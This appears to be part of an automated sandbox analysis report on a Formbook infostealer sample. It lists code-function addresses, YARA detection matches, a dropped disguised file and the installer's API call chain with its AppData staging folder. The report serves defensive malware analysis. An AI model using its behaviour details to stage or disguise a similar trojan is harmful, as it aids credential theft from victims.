Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00012FB0 2_2_00012FB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A222AE 2_2_02A222AE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A0FA2B 2_2_02A0FA2B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B236 2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298138B 2_2_0298138B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298EBB0 2_2_0298EBB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298ABD8 2_2_0298ABD8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A023E3 2_2_02A023E3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1DBD2 2_2_02A1DBD2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A103DA 2_2_02A103DA
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A22B28 2_2_02A22B28
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029FCB4F 2_2_029FCB4F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297AB40 2_2_0297AB40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296B090 2_2_0296B090
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A220A8 2_2_02A220A8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029820A0 2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A228EC 2_2_02A228EC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A2E824 2_2_02A2E824
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A11002 2_2_02A11002
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A830 2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029799BF 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295F900 2_2_0295F900
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02974120 2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A22EF7 2_2_02A22EF7
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02976E30 2_2_02976E30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1D616 2_2_02A1D616
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A21FF1 2_2_02A21FF1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A2DFCE 2_2_02A2DFCE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14496 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296841F 2_2_0296841F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1D466 2_2_02A1D466
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B477 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02982581 2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A12D82 2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296D5E0 2_2_0296D5E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A225DD 2_2_02A225DD
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A22D07 2_2_02A22D07
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02950D20 2_2_02950D20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A21D55 2_2_02A21D55
Source: C:\Windows\explorer.exe Code function: 19_2_065BFA32 19_2_065BFA32
Source: C:\Windows\explorer.exe Code function: 19_2_065B6072 19_2_065B6072
Source: C:\Windows\explorer.exe Code function: 19_2_065B6069 19_2_065B6069
Source: C:\Windows\explorer.exe Code function: 19_2_065C2A6F 19_2_065C2A6F
Source: C:\Windows\explorer.exe Code function: 19_2_065BE862 19_2_065BE862
Source: C:\Windows\explorer.exe Code function: 19_2_065B7CF2 19_2_065B7CF2
Source: C:\Windows\explorer.exe Code function: 19_2_065B7CEC 19_2_065B7CEC
Source: C:\Windows\explorer.exe Code function: 19_2_065BAB1F 19_2_065BAB1F
Source: C:\Windows\explorer.exe Code function: 19_2_065C2B0E 19_2_065C2B0E
Source: C:\Windows\explorer.exe Code function: 19_2_065BD132 19_2_065BD132
Source: C:\Windows\explorer.exe Code function: 19_2_065BAB22 19_2_065BAB22
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4496 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B0841F 24_2_04B0841F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B477 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BBD466 24_2_04BBD466
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B22581 24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB2D82 24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B0D5E0 24_2_04B0D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC25DD 24_2_04BC25DD
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04AF0D20 24_2_04AF0D20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC2D07 24_2_04BC2D07
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC1D55 24_2_04BC1D55
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC2EF7 24_2_04BC2EF7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B16E30 24_2_04B16E30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BBD616 24_2_04BBD616
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC1FF1 24_2_04BC1FF1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BCDFCE 24_2_04BCDFCE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B220A0 24_2_04B220A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC20A8 24_2_04BC20A8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B0B090 24_2_04B0B090
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC28EC 24_2_04BC28EC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1A830 24_2_04B1A830
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BCE824 24_2_04BCE824
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB1002 24_2_04BB1002
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B199BF 24_2_04B199BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B14120 24_2_04B14120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04AFF900 24_2_04AFF900
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC22AE 24_2_04BC22AE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB4AEF 24_2_04BB4AEF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1B236 24_2_04B1B236
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BAFA2B 24_2_04BAFA2B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2EBB0 24_2_04B2EBB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2138B 24_2_04B2138B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BA23E3 24_2_04BA23E3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BB03DA 24_2_04BB03DA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BBDBD2 24_2_04BBDBD2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B2ABD8 24_2_04B2ABD8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04BC2B28 24_2_04BC2B28
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1A309 24_2_04B1A309
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B1AB40 24_2_04B1AB40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B9CB4F 24_2_04B9CB4F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003EE241 24_2_003EE241
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003D2D90 24_2_003D2D90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003D2D87 24_2_003D2D87
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003D9E30 24_2_003D9E30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003D9E2B 24_2_003D9E2B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003D2FB0 24_2_003D2FB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00014040 29_2_00014040
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00109056 29_2_00109056
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000C6100 29_2_000C6100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000E8140 29_2_000E8140
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00109176 29_2_00109176
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00091180 29_2_00091180
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0010D1A0 29_2_0010D1A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0003A1D0 29_2_0003A1D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00032210 29_2_00032210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000F2227 29_2_000F2227
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00088240 29_2_00088240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0002F250 29_2_0002F250
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00023270 29_2_00023270
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000312B0 29_2_000312B0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0005B400 29_2_0005B400
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000F2459 29_2_000F2459
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00041510 29_2_00041510
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0003A520 29_2_0003A520
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000475F0 29_2_000475F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00020650 29_2_00020650
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0001A690 29_2_0001A690
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0003B6D0 29_2_0003B6D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00026740 29_2_00026740
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000C2780 29_2_000C2780
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0010D800 29_2_0010D800
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0010C890 29_2_0010C890
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00029900 29_2_00029900
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0010691C 29_2_0010691C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00041910 29_2_00041910
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000FA9E0 29_2_000FA9E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00059A20 29_2_00059A20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0013DA40 29_2_0013DA40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0002FA70 29_2_0002FA70
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00031A90 29_2_00031A90
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0003DB10 29_2_0003DB10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00034C20 29_2_00034C20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000D1C40 29_2_000D1C40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000F9C52 29_2_000F9C52
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000D8CB0 29_2_000D8CB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00020E10 29_2_00020E10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0001EE80 29_2_0001EE80
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0004BED0 29_2_0004BED0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000C2FA0 29_2_000C2FA0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00047FE0 29_2_00047FE0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E54BE9C 32_2_6E54BE9C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E54FC23 32_2_6E54FC23
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E546D29 32_2_6E546D29
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E54FB03 32_2_6E54FB03
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E524B20 32_2_6E524B20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E577920 32_2_6E577920
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E53661F 32_2_6E53661F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E55D620 32_2_6E55D620
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E5312F0 32_2_6E5312F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E53B295 32_2_6E53B295
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E54E372 32_2_6E54E372
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E5363ED 32_2_6E5363ED
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E575020 32_2_6E575020
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E53D1F0 32_2_6E53D1F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E53E1B6 32_2_6E53E1B6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E5361BB 32_2_6E5361BB
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: String function: 000E6420 appears 38 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: String function: 000122F0 appears 160 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: String function: 6E55C7C0 appears 137 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: String function: 6E52F9A0 appears 73 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: String function: 00058310 appears 67 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: String function: 6E530370 appears 56 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: String function: 6E5535F0 appears 55 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: String function: 0295B150 appears 136 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 04AFB150 appears 136 times
PE file contains strange resources
Source: focus.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: player-toolkit.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: focus.exe, 00000000.00000002.196953133.0000000002810000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs focus.exe
Uses 32bit PE files
Source: focus.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/15@1/1
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_0040460D
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar, 0_2_0040216B
Source: C:\Users\user\Desktop\focus.exe File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_01
Source: C:\Users\user\Desktop\focus.exe File created: C:\Users\user\AppData\Local\Temp\nsv512F.tmp Jump to behavior
Source: focus.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\focus.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\focus.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
